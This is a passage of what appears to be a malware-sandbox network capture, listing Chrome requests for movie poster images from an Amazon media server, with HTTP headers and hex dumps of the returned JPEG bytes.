                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: d3 23 ce 73 31 72 77 17 c8 aa b5 08 1a ae df 2c 95 eb 91 81 3c 60 f4 48 7c 8b e1 cb 83 8d 8b ba 1d c3 74 c5 ae 33 cd 0b 57 05 97 1b 70 7d cb 16 4b d8 be 1e e3 f6 23 9d 5b e1 d7 76 ac 36 fc 7d d3 e3 79 5b 3e 57 d3 cc 07 4f 1e 8c 46 85 3f 02 9a ec bd b8 d2 a7 2e ab ad cb 09 4a 8a ea 7b c7 92 5e 36 66 18 f0 05 0e 33 4f 9b be 73 55 6e 2b 1f ef 35 b2 78 4e d7 b5 32 51 0b 6f db 8a c7 1e 72 aa 6e c9 1c 51 91 0b 7c 98 5f 04 b6 6e 0b ed 93 5b d5 31 be 73 7b 5e 71 27 e6 59 a9 63 88 7f e4 2d b9 c5 b0 72 a8 38 d5 2b fe c7 d7 e5 43 0c 6c 49 f0 59 e4 b2 bd 97 8d c3 21 7d 4d 4c 59 fd aa 6e 52 0f 31 5d cf e4 53 90 28 92 de 63 5e 15 d3 1c 7b f1 ed 33 f2 6e 38 cb ac cd 92 19 bd 3c cb f1 9c 44 c6 7c 55 3f 1d c4 6c 55 c3 69 fc 5f 0a 31 a4 95 b6 0d aa 3e 32 f5 dd 7e 3e 99 83
                                                                                                                                                                                          Data Ascii: #s1rw,<`H|t3Wp}K#[v6}y[>WOF?.J{^6f3OsUn+5xN2QornQ|_n[1s{^q'Yc-r8+ClIY!}MLYnR1]S(c^{3n8<D|U?lUi_1>2~>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          143192.168.2.1649887151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:18 UTC413OUTGET /images/M/MV5BMjIxOTIyNjE4OF5BMl5BanBnXkFtZTgwMDc5NTY2MDE@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:18 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 32570
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: c20869f7-294d-48da-8e5c-31cbc966f2ef
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Thu, 21 Nov 2013 16:11:56 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Tue, 06 Dec 2044 15:08:22 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:18 GMT
                                                                                                                                                                                          Age: 13288
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000065-IAD, cache-ewr-kewr1740058-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 a9 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 06 02 04 05 07 01 03 08 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 01 00 02 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 28 c6 69 9c db 87 1b 06 5a ea e4 db 78
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5(iZx
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 05 a9 2c f6 73 00 99 00 fd 4b 5d d6 9c 27 ce 75 32 9c 42 4c 02 29 5d 0d 7d 33 10 77 3a 10 c8 1e 6e da ea 57 4a 84 9b c3 4a ef 20 84 10 a3 98 29 a1 e9 9e 4e c4 8e 36 42 b6 96 7c 05 66 d7 3b 16 e2 18 e7 2d 8a 48 ee 1b e5 85 55 71 26 06 9b aa d2 54 f3 6a 83 34 16 30 af 1c 15 15 d3 a1 af 8e b3 26 26 10 9e 09 cb 6e b9 b4 de ee 71 8f b1 59 e0 75 57 b2 70 8e 46 92 aa 5b 5e a2 d8 a9 47 b7 94 89 f4 1c 98 4c 2e 4e ab 27 1b 3a 6f a3 33 f8 42 58 e8 c3 56 36 e4 02 31 f1 73 3b e6 36 4d 75 7c 54 75 42 a1 0c 61 66 53 54 f5 d6 f2 bb 68 97 82 5a c8 bd a0 2c 12 5a 72 c5 2e 2c 16 bc fa c4 8a 85 5f 03 bb 87 99 27 a6 86 58 ce a8 35 42 f1 2e 86 9c 36 2a 88 92 c0 dc 3e b2 fc 4e 13 c8 50 f5 2b 73 d4 1b 34 a8 d9 51 e9 4e fb 27 4c d4 68 f8 4f 2c 00 83 14 5a cc 6c bc c4 b4 97 40 c4
                                                                                                                                                                                          Data Ascii: ,sK]'u2BL)]}3w:nWJJ )N6B|f;-HUq&Tj40&&nqYuWpF[^GL.N':o3BXV61s;6Mu|TuBafSThZ,Zr.,_'X5B.6*>NP+s4QN'LhO,Zl@
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 8b e9 d9 60 39 f2 76 48 af ed 38 d5 cc 7a 25 82 3a 88 33 81 1e 17 34 3f af cd 96 0b 38 de 09 e0 a4 23 98 d6 82 40 d7 53 02 d8 74 44 30 ec 30 81 f2 5b c3 08 ab 8b 0d ea ee 59 b6 6a fb 2c 6d 8f 64 1d e7 d5 ce 18 4c 62 bd a5 29 78 f5 42 a4 fb d1 98 28 c0 53 4e 02 f7 bd e7 af 2b de 4b 76 fd 1b 09 bd 35 2b 5f 37 e9 09 1e 9f 8d d0 c1 aa b5 ef d5 a7 c9 f9 c3 4c b4 e9 5f b0 46 7c a4 a4 9c 2d 29 63 d9 c2 49 46 cc 25 7b d1 f7 a5 08 e5 9c e3 21 7b d8 c0 59 9c 84 49 56 34 c5 3f d2 e8 73 76 b5 a5 14 e3 ca 49 3e c6 52 f2 d0 a4 b6 6c d6 b4 7f ff c4 00 31 10 00 02 01 03 03 02 05 04 02 03 00 03 01 01 00 00 01 02 03 00 04 11 05 12 13 10 21 14 20 22 31 32 23 30 33 41 15 42 24 34 51 40 43 52 45 61 ff da 00 08 01 01 00 01 08 02 e8 d7 d1 8f 68 ef 62 7e df f9 fc a9 e5 bb 66 b9
                                                                                                                                                                                          Data Ascii: `9vH8z%:34?8#@StD00[Yj,mdLb)xB(SN+Kv5+_7L_F|-)cIF%{!{YIV4?svI>Rl1! "12#03AB$4Q@CREahb~f
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 68 b8 a3 44 a3 32 03 8e 91 ea 2b 2c a1 15 f5 44 0c 00 d5 9f e9 a0 16 d7 3e 1f 71 0f 24 b3 f7 30 c5 c7 04 b3 d6 9c 9f 55 6b 55 3f 52 21 5b 8b 04 8c 38 da 64 5a 9e 6e 18 b7 d6 9f 1e e9 37 1d 4d be 98 5a b3 1b a6 8e b1 d0 8e 86 8b 0a 66 a9 ea 6a 35 a6 4e 21 93 d5 e5 9f 4a 95 1d 8c 5f f6 a2 5d 88 ab 57 33 f0 21 6a d3 e0 e5 7d ed 71 7a d7 07 8e 19 22 68 db 6b d9 4a 7c 3b 1a 8b b2 ad 5c 42 d0 08 dd b3 fa ad 36 14 60 59 ab 54 fc 0d 5a 67 e4 6a d4 8f f9 15 60 9b e5 15 3f e5 9e af df d1 6e 2b 4c f8 bd 6a 12 ef 7c 56 9b f9 c7 4c 53 b6 df 76 90 fe 89 ff 00 b9 14 69 df 3e ef 10 63 da 5b 52 3d 96 13 56 f3 c9 0d 43 72 b2 f6 f2 c2 37 ec a3 da ae 25 6b c9 02 a5 eb 8b 74 16 e9 a6 db ec 4d e6 69 5a 56 62 d2 a0 82 09 15 60 8f 71 8d 69 d4 38 2a 75 20 16 54 03 4b fc 66 a4 95
                                                                                                                                                                                          Data Ascii: hD2+,D>q$0UkU?R![8dZn7MZfj5N!J_]W3!j}qz"hkJ|;\B6`YTZgj`?n+Lj|VLSvi>c[R=VCr7%ktMiZVb`qi8*u TKf
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: b4 5a b8 fc 66 9a 33 26 ec 2c 7b 0b 66 d3 88 77 78 e1 2e 24 2b 6f 36 d2 92 54 d2 f2 bb 31 b0 4d b0 ae 75 55 e3 98 39 b0 b5 df f5 1a 4d 32 58 8f d2 b6 d3 c8 3b a5 d4 2d b7 8c d3 a6 0f 70 2a 28 17 68 85 76 04 3e 99 18 cc 3d 07 4e 1f a1 6f 34 79 db 72 24 01 77 56 e6 96 b1 56 32 05 93 ba ae 3b d7 bd 5e ae 1b 3e 5d 45 b1 20 a8 46 d6 a9 53 70 ec b0 e7 dd 98 20 a8 fb c8 0d 71 72 47 20 a8 a4 f8 b0 e1 91 d1 9d 60 b6 79 8d 47 1a c4 36 8f e3 65 46 2a ab 65 0e 15 49 ef 4c 81 86 0f 56 38 f7 b9 b7 53 ca c9 56 57 e6 db d3 49 76 b7 1f 3e 50 7a b0 0d d8 cf 17 1b 91 40 fe fa 2f bd 5b 9c a0 ca 55 f0 ec 3c ba b4 59 5d c2 41 9e e1 6e 01 f9 19 ff 00 e1 39 ef 50 0e e4 d2 c9 b5 85 41 68 18 fa 54 e3 b5 67 15 be b3 42 81 eb 8f f9 79 76 b6 eb ba b7 4d 73 ea 36 96 a8 1c e5 d4 a1 2a
                                                                                                                                                                                          Data Ascii: Zf3&,{fwx.$+o6T1MuU9M2X;-p*(hv>=No4yr$wVV2;^>]E FSp qrG `yG6eF*eILV8SVWIv>Pz@/[U<Y]An9PAhTgByvMs6*
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: db d2 58 63 99 b7 b2 c2 8b f0 55 a0 bd 35 6b 7d c9 be 8f 41 13 9a 8b 4d 91 f1 96 b0 c5 25 a8 5e f5 8c 76 4b eb 61 6c 11 3c f6 b1 8b 58 da 49 26 99 a7 62 ed f7 15 da cd f3 51 4e 18 64 6f 06 88 a7 8a 84 ea ae 11 f1 8e b3 2e e5 22 a4 4d 8c 56 81 c5 5b 5f e7 01 81 14 d8 03 34 33 2f c6 28 c2 7b 6a 17 1c f3 33 0f 2e 9f 6d cc d9 ad 42 e4 4a 76 27 99 f1 b8 ed f3 66 b7 b5 99 ca ad da c8 3b 2c b4 45 4b 10 90 61 b6 4d 6a 7e 9d b5 e0 98 52 b0 3d c5 6a 43 12 f5 47 28 72 2d f5 08 07 e4 6d 46 10 bb aa eb 54 79 c1 55 f2 c6 86 46 0a 2f 9c 5b 44 22 5a 1e 6f 7f b0 c3 70 c1 47 e1 72 2a 39 76 f7 0a ff 00 f3 e5 45 69 ad f7 77 19 23 dd 65 35 a8 ca 1d c6 3a 63 ca 7c 9a 54 20 6e 99 ae 26 33 3b 39 fb f7 12 f1 ad 66 93 0d eb 8d 5d e3 1b 95 2f 56 92 7c d0 21 aa e2 af db 62 f5 f0 92
                                                                                                                                                                                          Data Ascii: XcU5k}AM%^vKal<XI&bQNdo."MV[_43/({j3.mBJv'f;,EKaMj~R=jCG(r-mFTyUF/[D"ZopGr*9vEiw#e5:c|T n&3;9f]/V|!b
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 1d 68 79 5e 26 0a 36 cd 58 75 81 7d f3 8c e3 25 af 0a 34 a7 d0 ae c1 19 d8 41 d6 22 91 b3 83 7e 95 e8 cb 66 64 82 01 07 0d c1 7d b6 b8 ae b0 ad cb 4a 68 cd c9 50 4a bc 85 8a f1 0c 8a bb 4d 22 44 bc e7 13 05 19 6b d2 83 8b e3 b9 14 96 59 ea c7 d3 6f 63 8d 93 92 7e 43 a5 2c f1 b1 43 24 fc 7f 01 56 b4 70 dc e4 ed 37 ee 28 cd 9c df a1 3d cc 71 54 fc 1c de 74 b7 21 4e ad c7 92 d7 51 70 f4 e9 71 f0 08 3a 66 a8 ac 2c 72 f3 d7 e8 4f ad 90 cd c9 71 5d 13 0c 96 6f d6 b3 5f a3 78 b3 35 79 e9 f2 bd 65 05 1b f2 ac 15 f9 a9 6e 71 7c 95 f9 78 c2 95 f8 28 e7 93 91 ac 6f c7 c5 f9 27 ac f7 3a 8d 22 cb bf f6 82 3b b0 d9 03 e1 ac b1 c5 6d 1c 13 2e b0 38 3e 90 c4 5e 54 41 ce 70 53 5f 9e 95 58 e9 59 ad 6a c0 af 5f a7 ec c9 7e fd de 46 4e 9e b4 e2 b7 25 69 fa 72 67 3c a4 60 dc
                                                                                                                                                                                          Data Ascii: hy^&6Xu}%4A"~fd}JhPJM"DkYoc~C,C$Vp7(=qTt!NQpq:f,rOq]o_x5yenq|x(o':";m.8>^TApS_XYj_~FN%irg<`
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 10 dc 20 b7 4e 01 76 ec 57 0c 34 0b 81 82 d0 48 85 f0 e4 0f bb 3c a3 01 9e 4f 79 05 bb 98 1f 4e 46 bb 0e 01 7b ef b0 e1 86 8f 93 e3 35 bc 76 0a 6a b1 c3 d0 bc 2a 4a d0 01 f0 8f c4 f0 cf 16 1d 02 9c 30 26 6e 0a 40 82 ac c8 53 4e cf 1f b3 3c 5e b2 78 fd 88 2a cc 9d 3d ec 6a 8e 92 a1 5c c4 af a2 e4 64 4e a4 3f e8 b8 a0 ec 17 52 3d 03 65 6b f9 56 46 1a a2 ca c8 d0 5a b1 bb e6 a8 00 4f 9e 91 3c 95 e7 68 ad 5b ff 00 ad dc 91 5a 9c 1f 28 df d8 f9 55 fe c7 ca d3 fd a7 c8 50 e7 07 9e 98 2e a1 bf 01 50 cb 93 54 41 59 22 2a e3 b0 3e 27 2b a5 0e a1 11 6a 70 be 98 77 62 f1 15 95 fb b2 02 af d8 fe 88 f8 fb ca 3f 0f bc 93 fc a0 1f 5d 49 38 28 da 55 d9 df 95 5f 8c 34 ed fc c9 05 cc c9 9f 76 58 ca c3 2b 72 cb a7 23 58 11 4b 1a 9c ba f6 39 f5 7b 82 fe b6 6c 4b 7a 3a b4 16
                                                                                                                                                                                          Data Ascii: NvW4H<OyNF{5vj*J0&n@SN<^x*=j\dN?R=ekVFZO<h[Z(UP.PTAY"*>'+jpwb?]I8(U_4vX+r#XK9{lKz:
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: a2 b2 92 ff da 00 08 01 01 00 09 3f 02 b2 3c 02 2e e3 09 fe fd a1 d7 27 55 fd 77 f5 a2 7b 5f 3a 2a d2 9f 28 a5 17 6e 75 3d 91 71 f8 51 73 dc fe 6b 6c f6 57 3c 26 8e 64 b7 28 18 7b 23 21 18 de 13 5a ba b1 59 ad 97 2d 66 49 0d 58 d4 58 6e 0a ac c9 1c e7 4f 78 53 1a d6 18 92 5d b9 18 34 f7 d9 46 bb 23 8a d3 e0 af 18 ce 4d 3d 94 5f 8a d1 46 24 9e 4a 0c 91 dd 17 83 2a a9 99 2c 33 9a c2 08 32 41 4d 3f 19 f1 b9 d3 58 77 34 d0 80 71 18 ca 0d b1 3b 2e 2a 80 4d 0d bf 75 d5 78 d9 e5 45 7a 11 fd 4e c1 6c 98 f0 2a 4e 70 de 81 cf 94 26 a2 61 ee aa 23 0b 82 1a d2 de e5 3c d7 a9 34 0b f8 d8 22 db 70 82 32 f4 52 0d 41 09 b7 66 b0 27 9a 90 7b ca bd c2 0a 4d 89 ba a9 9c e8 ba fd ce 51 84 6a b5 48 1d 56 d3 45 6b 02 79 a1 9b 7a 96 31 77 05 2f 24 70 4f 73 83 4c e7 10 9b 9b 5a
                                                                                                                                                                                          Data Ascii: ?<.'Uw{_:*(nu=qQsklW<&d({#!ZY-fIXXnOxS]4F#M=_F$J*,32AM?Xw4q;.*MuxEzNl*Np&a#<4"p2RAf'{MQjHVEkyz1w/$pOsLZ
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: e5 55 57 a9 36 cc f7 85 2a 6f 59 cc dc f7 10 9d fe 33 ea 85 90 47 1c 54 d0 3f de 8a 00 28 03 b5 ed ee 9a 44 1e 28 01 c0 59 21 65 d6 d7 27 c2 56 d0 f2 54 b3 90 5b d4 dd 60 7f ad e9 92 cf 15 24 ec 47 c1 a7 c9 32 f7 1b 23 93 47 1e b0 3d 2c 0f 1d d1 ff 00 5b f8 df a0 85 b7 e5 c3 ca da 0f 34 3b b9 35 9b e1 22 3a 21 1b 93 5c 82 7e 7b 2d 4f 7a a5 90 64 3e 28 50 2e 96 eb 53 7a ac f4 fc d7 e1 43 45 3f 24 e6 e7 5b 91 06 2c 97 b9 ca 44 db d2 b6 8b 7d 9e 8d b5 43 41 1c 8a e4 9f 73 c9 60 dd c6 7c ac 9a 95 5f b5 f6 4f 6c 51 99 33 d6 65 4c e4 75 aa 8b 3e 2a 8e 39 37 29 b8 be db 8f 92 6b 15 f4 ca 97 86 88 64 9f 75 2b 44 77 44 a7 b6 77 48 7f b5 54 37 8c e7 fa 26 b8 02 ec ee 76 42 e7 64 d6 dd 4f fc fd 94 80 fc 64 1b c5 bf 1f 13 d0 68 7f 19 0c bc 10 27 b3 67 44 1c 2f 32 0a
                                                                                                                                                                                          Data Ascii: UW6*oY3GT?(D(Y!e'VT[`$G2#G=,[4;5":!\~{-Ozd>(P.SzCE?$[,D}CAs`|_OlQ3eLu>*97)kdu+DwDwHT7&vBdOdh'gD/2


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          144192.168.2.1649886151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:18 UTC676OUTGET /images/M/MV5BYTYxNGMyZTYtMjE3MS00MzNjLWFjNmYtMDk3N2FmM2JiM2M1XkEyXkFqcGdeQXVyNjY5NDU4NzI@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:18 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 25520
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 592a52be-273a-4be9-8f59-92dfb94eb1dc
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Sat, 14 May 2016 19:22:20 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sat, 14 May 2044 06:15:13 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 1546507
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:18 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200153-IAD, cache-ewr-kewr1740078-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 be 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 02 03 01 01 01 01 01 00 00 00 00 00 00 00 00 04 05 02 03 06 07 01 00 08 09 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 00 01 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e6 12 ba 9f 5f e3 a9 85 90 a3 18 33 e9
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5_3
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 59 08 1a 36 de 6e 2d a3 03 1c 9c c8 3a 21 c9 4b 6b d1 9f 57 98 7c 69 cb 70 40 bf c6 a3 67 34 49 f5 5d 4e 6c fd 85 ef cf f4 e9 ba 54 a7 57 a4 17 4c 42 a5 48 63 a9 1a f1 b0 8d b1 76 5b f5 de 17 1e 67 5b f4 75 fc 0f aa 73 b5 68 6b 18 b9 5a 4b 81 6c 40 1d 2d 6a 21 57 9c d6 20 76 7c bc 18 57 b7 08 90 3a b9 49 6b 6f 03 58 26 dc 50 9c 2f 32 69 d5 57 34 ea 1c cd 1a f8 e2 e2 7e ef 70 48 fa 5f 69 c1 45 d4 5d 45 e4 3d 8d d4 ec 1e 52 5d 4f de 0d b4 6b 91 b7 1f 4b 58 cb 2b d0 f9 3d b5 5b 1b 3c c7 a9 ed fa 0a d7 4f 9c a0 70 6a 2e 3f 78 54 2a d6 82 12 f3 62 68 15 6a c8 25 2c 26 60 a7 e6 3e d8 82 49 e0 29 f7 8f 81 5a bd 1d 17 83 e8 30 db 32 28 be d9 f6 7c f7 df 4f d3 52 cb 68 b6 b4 4e 50 b6 c2 b8 df 44 9e 55 6d 20 c8 4f e6 79 f5 41 8b 9d 5f 3b b0 c9 e8 ba ce 3f 53 cd 0e
                                                                                                                                                                                          Data Ascii: Y6n-:!KkW|ip@g4I]NlTWLBHcv[g[ushkZKl@-j!W v|W:IkoX&P/2iW4~pH_iE]E=R]OkKX+=[<Opj.?xT*bhj%,&`>I)Z02(|ORhNPDUm OyA_;?S
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: d1 8a 05 e0 19 9d ad c7 b4 30 d0 4f 38 30 de af 1e 61 0a 8c 69 54 30 c6 42 ac 81 57 ff c4 00 2f 10 00 02 02 01 03 03 03 03 05 00 02 03 01 00 00 00 01 02 00 03 11 04 12 21 10 13 31 20 22 41 05 14 30 23 32 33 42 51 15 40 52 61 71 34 ff da 00 08 01 01 00 01 08 02 f4 91 15 b1 ff 00 64 08 04 da 21 48 56 62 6c cf e0 a3 9e 3a 9e a7 a1 5c 63 d0 06 78 1f 8b 1d 04 c4 c7 e2 32 86 e6 38 e6 53 7d 6a 98 6a 76 6f 1d da b6 06 6d d4 32 23 36 e3 34 b6 d2 95 91 65 25 40 b3 78 35 f6 5b 3b ea ed 62 16 ab b0 04 2f 5f 64 08 66 aa da dd 50 2d a5 48 ab 6e a5 90 9f d3 d4 ba 33 0d 9a 92 85 ff 00 4f 58 6a 6b 33 46 a1 aa 6b 41 4d 41 46 72 6b e8 b8 e9 9f 46 7d 66 56 70 63 8f 1d 0f 5f fe ca 6c ed 3a b8 ae e2 9b e0 b7 15 9a e3 be f5 44 96 6a 4b db dd 8b 79 57 2e 15 f6 a3 27 e1 f8 fc c6
                                                                                                                                                                                          Data Ascii: 0O80aiT0BW/!1 "A0#23BQ@Raq4d!HVbl:\cx28S}jjvom2#64e%@x5[;b/_dfP-Hn3OXjk3FkAMAFrkF}fVpc_l:DjKyW.'
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 66 de 98 cc d5 fb 44 69 99 8e 83 e3 d5 89 88 20 26 57 79 12 8d 52 bc 79 5c 65 8a 71 04 c4 c4 c7 4b 3a 11 31 18 4c 74 02 01 31 31 3c 4d 4a 6e 32 c3 fe 0e a3 d2 3a 8e 84 40 60 bd 84 a6 de 33 1a f8 84 3c 5e b8 e8 e2 63 a9 98 98 98 80 7a 35 67 31 fc c1 d4 7e 05 69 ba 06 cc ed cd b3 4c 7f ac db 13 88 8d 9f 41 84 42 3a 62 62 62 62 62 01 d3 32 c7 da 25 f7 16 e8 3a 8f c5 59 00 fb 8e ae b0 78 ed e4 03 13 da 73 31 c4 55 80 41 e9 22 11 31 31 31 00 e8 4c b7 5b e7 03 54 47 12 cb 73 1a 63 d0 3f 16 22 d7 99 48 7c f2 46 25 6d f1 31 d0 7a f1 d3 1d 1e 36 a0 2e 72 ef 93 33 0f a7 3f 89 56 22 08 ae a9 2a d6 6e 6d b1 93 30 2e 20 f4 19 9e a4 7a 18 e2 6a 75 3f 01 84 db 31 31 36 cd b3 61 11 df 12 bf 1e bc 4d 90 0f 46 25 56 b2 1e 29 d4 ef f2 20 ea dd 73 e9 d4 31 3c 0b 16 6d 82 a9
                                                                                                                                                                                          Data Ascii: fDi &WyRy\eqK:1Lt11<MJn2:@`3<^cz5g1~iLAB:bbbbb2%:Yxs1UA"111L[TGsc?"H|F%m1z6.r3?V"*nm0. zju?116aMF%V) s1<m
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: b8 a6 c7 16 59 50 e2 9d 39 fd 56 6b 6a c9 af 08 cb 4a 9c 5d 61 54 4d 96 69 5c 12 a7 53 a6 76 62 e2 8a 9c a3 88 f5 05 0b 64 fb 6c 79 b7 56 48 da 96 b6 70 08 2b e5 84 b1 33 3b 25 a1 d3 9f 8a a8 fe cd 77 b4 6e 5f 3d 30 61 b6 69 f3 b8 34 09 9f 2f 57 b1 56 3b 6c f6 83 73 5b 2b d3 41 48 55 c2 bd 6c 39 26 e5 8d 76 ec 6f 3a aa d6 7d cf 90 95 69 7b 9c d9 bc 26 ec ab 1d 46 65 da 85 a4 7b f7 d6 fe 1e b1 f2 2a af 28 11 f1 de 45 2a e1 5a d9 a8 04 9c ca 46 ca c8 87 4c 42 89 a8 27 b4 a0 1d 12 0f 16 67 7b 66 07 c0 95 9d ca 23 64 8d a1 6f 3f b5 f3 fe 21 2e af 01 c4 2e 04 de 0f 9d 9b 46 58 32 d7 80 bd ec 12 01 d5 fc 03 86 c9 6d 4d c8 cd 85 4f 67 ba 3d cd 88 09 5f 72 f7 37 8c c7 2c c4 ac 1a 56 3e 74 f5 65 bd df 71 5c 47 cb 36 da 5c 28 c4 be 97 77 67 3d b2 a3 8f 9e 74 ed b1
                                                                                                                                                                                          Data Ascii: YP9VkjJ]aTMi\SvbdlyVHp+3;%wn_=0ai4/WV;ls[+AHUl9&vo:}i{&Fe{*(E*ZFLB'g{f#do?!..FX2mMOg=_r7,V>teq\G6\(wg=t
